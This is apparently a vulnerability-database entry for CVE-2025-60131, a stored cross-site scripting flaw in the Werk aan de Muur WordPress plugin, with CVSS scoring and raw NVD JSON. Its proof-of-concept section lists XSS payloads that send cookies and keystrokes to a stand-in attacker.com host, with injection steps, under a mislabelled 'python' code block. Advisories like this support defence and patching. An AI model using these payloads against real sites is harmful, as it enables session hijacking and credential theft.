Security Vulnerability Report
中文
CVE-2025-60131 CVSS 5.9 MEDIUM

CVE-2025-60131

Published: 2025-10-22 15:15:57
Last Modified: 2026-04-27 16:16:32

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zoefff Werk aan de Muur werk-aan-de-muur allows Stored XSS.This issue affects Werk aan de Muur: from n/a through <= 1.5.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Werk aan de Muur WordPress插件 <= 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60131 Stored XSS PoC --> <!-- Payload for Werk aan de Muur plugin <= 1.5 --> <!-- Method 1: Basic XSS Payload --> <script>alert('XSS');</script> <!-- Method 2: Cookie Stealing Payload --> <img src=x onerror="this.src='https://attacker.com/steal?c='+document.cookie;'"></img> <!-- Method 3: Stored XSS via plugin input field --> <svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))> <!-- Method 4: Keylogger Payload --> <script>document.onkeypress=function(e){new Image().src='https://attacker.com/klog?k='+e.key;}</script> <!-- Exploitation Steps: --> <!-- 1. Login to WordPress with admin/editor privileges --> <!-- 2. Navigate to Werk aan de Muur plugin settings --> <!-- 3. Inject XSS payload in any input field --> <!-- 4. Save the configuration --> <!-- 5. When admin views the affected page, XSS will execute -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60131", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:56.770", "lastModified": "2026-04-27T16:16:32.320", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zoefff Werk aan de Muur werk-aan-de-muur allows Stored XSS.This issue affects Werk aan de Muur: from n/a through <= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/werk-aan-de-muur/vulnerability/wordpress-werk-aan-de-muur-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}